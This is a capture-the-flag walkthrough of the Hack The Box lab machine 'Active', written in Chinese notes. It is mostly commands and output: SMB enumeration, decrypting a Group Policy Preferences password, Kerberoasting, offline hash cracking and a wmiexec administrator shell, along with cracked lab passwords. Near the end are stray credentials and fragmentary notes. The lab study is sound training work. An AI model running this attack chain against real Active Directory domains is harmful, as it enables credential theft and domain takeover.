HTB Active
![[Pasted image 20221004114359.png]]
SYNOPSIS
Skills Required
- Active Directory 的身份验证(authentication)和共享文件夹(shared folders)的基本知识
Skills Learned
- SMB 枚举技术
- 组策略首选项 Groups.xml 枚举和利用
- 识别和利用 Kerberoastable 帐户
Enumeration
端口扫描
masscan -p1-65535 10.129.125.59 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.129.125.59
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-04 05:56:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-10-04T05:57:15
|_ start_date: 2022-10-04T03:40:06
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
枚举445端口
$ nmap --script safe -p445 10.129.125.59
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-04 07:14 BST
Pre-scan script results:
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
Nmap scan report for active.htb (10.129.125.59)
Host is up (0.0042s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-mbenum:
|_ ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 1s
|_fcrdns: FAIL (No PTR record)
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-time:
| date: 2022-10-04T06:15:30
|_ start_date: 2022-10-04T03:40:06
| smb2-capabilities:
| 2.0.2:
| Distributed File System
| 2.1:
| Distributed File System
| Leasing
|_ Multi-credit operations
| dns-blacklist:
| SPAM
| l2.apews.org - FAIL
|_ list.quorum.to - FAIL
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
| smb-protocols:
| dialects:
| 2.0.2
|_ 2.1
| port-states:
| tcp:
|_ open: 445
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
Post-scan script results:
| reverse-index:
|_ 445/tcp: 10.129.125.59
枚举SMB
$ smbmap.py -H -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
$ smbclient -L //10.129.125.59
Enter WORKGROUP\htb-ovuln's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
$ smbclient //$target/Replication
Enter WORKGROUP\htb-ovuln's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
smb: \> dir
. D 0 Sat Jul 21 11:37:44 2018
.. D 0 Sat Jul 21 11:37:44 2018
active.htb D 0 Sat Jul 21 11:37:44 2018
10459647 blocks of size 4096. 5203372 blocks available
$ smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (2.7 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (14.5 KiloBytes/sec) (average 6.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (340.3 KiloBytes/sec) (average 87.4 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (65.1 KiloBytes/sec) (average 83.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (107.2 KiloBytes/sec) (average 87.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (454.3 KiloBytes/sec) (average 137.5 KiloBytes/sec)
smbmap 可以 Groups.xml
文件为目标
$ smbmap -R Replication -H 10.129.125.59 -A Groups.xml -q
mount 更强大的枚举
sudo apt install cifs-utils
mkdir /mnt/Replication
mount -t cifs //10.129.125.59/Replication /mnt/Replication -o
username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication
SYSVOL副本 存储组策略 提权 提取Groups.xml --IppSec
将 RECURSE 设置为ON 将 PROMPT 设置为OFF
组策略首选项(Group Policy Preferences)
Windows Server 2008 引入,允许管理员在网络中修改用户和组 利用示例 强密码被AES-256加密并存储在Groups.xml中 ?(翻译为理解)但2012年微软在MSDN上发布了AES密钥,意味着使用GPP设置的密码现在很容易被破解
$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Authenticated Enumeration
使用 active.htb 域的有效凭据,可以进行进一步枚举。SYSVOL和Users 共享现在可以访问
ldapsearch
可用于查询活动账户的 Active Directory UserAccountControl
属性的域控制器,以及可能应用于它们的其他特定配置。许多 UserAccountControl
也具有安全相关性。可能的UserAccountControl
值
2
的值对应于禁用的账户状态,因此下面的查询返回 active.htb 域中的活跃用户 (by sAMAccountName / username)
$ ldapsearch -x -h 10.129.241.119 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountName
sAMAccountName: Administrator
sAMAccountName: SVC_TGS
Impacket
的 GetADUsers.py
简化了枚举域用户账户的过程。
$ GetADUsers.py -all active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Querying 10.129.241.119 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 20:06:40.351723 2022-10-07 04:16:04.670904
Guest <never> <never>
krbtgt 2018-07-18 19:50:36.972031 <never>
SVC_TGS 2018-07-18 21:14:38.402764 2022-10-07 06:05:45.308462
Exploitation
Kerberoasting
Kerberos 身份验证和服务主体名称
"Kerberoasting"用于在 Active Directory 域中作权限提升
从Kerberos "Ticket Granting Service" 票证回复(TGS_REP)中提取加密材料的哈希值,对其进行离线破解以检索明文密码。因为 TGS_REP
的服务实例在其上下文中运行的账户的名称使用的是NTLM 加密哈希的。
![[Pasted image 20221007134730.png]]
托管服务账户由于密码的复杂性而降低了这种风险,但他们在许多环境中并未积极使用。关闭服务器托管服务并不能缓解,因为攻击不涉及与目标的通信服务。因此,定期审核所有账户启用的目的和权限非常重要。
Kerberos
身份验证使用服务主体名称(SPN)来识别与特定服务实例关联的账户。ldapsearch
可用于识别配置了SPN的账户。
$ ldapsearch -x -h $target -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
dn: CN=Administrator,CN=Users,DC=active,DC=htb
servicePrincipalName: active/CIFS:445
active\Administrator
似乎已经配置了 SPN
Impacket
的 GetUserSPNs.py
再次简化了此过程,还能够请求 TGS 并提取散列进行离线破解。
$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2022-10-07 04:16:04.670904
$ GetUserSPNs.py active.htb/svc_tgs -dc-ip $target -request
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 20:06:40.351723 2022-10-07 04:16:04.670904
$krb5tgs$23$*Adminis<SNIP>
Cracking of Kerberos TGS Hash
使用 hashcat
和 john
很容易破解 active\administrator
的密码
$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable
<SNIP>ff9726:Ticketmaster1968
$ john --format:krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/htb-ovuln/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
<SNIP>
获取 Primary Domain Admin shell
Impacket
的 wmiexec.py
可以获得 active\administrator
的shell
$ wmiexec.py active/administrator:Ticketmaster1968@$target
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator
C:\>more C:\Users\administrator\Desktop\root.txt
Bonus: The "Old School(老派)" Kerberoasting Technique(技术)
Windows 和 Linux 有多种 kerberoasting 方法,下面复制了 Tim Medin 的原始 Kerberoasting 技术,该技术利用 Benjamin Delpy 的 Mimikatz 中的功能来导出 Kerberos 票证。
域计算机上可以使用内置实用程序 setspn.exe 枚举可用的SPN和关联账户
> whoami
avtive\svc_tgs
> setspn -T active.htb -F -Q */*
请求并从RAM
SYSVOL Active Directory 中所有身份验证的用户都具有读取权限的域范围共享。包含登陆脚本,组策略数据 利用组策略首选项
域组策略存储位置: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
记录
sysvolzhong dde ping zheng
挖掘 SYSVOL 获取凭证
10.129.227.164
htb-ovuln@htb-sda3amjbjo.htb-cloud.com W6AYrtug
Service Principal Names|服务主体名称
service instance|服务实例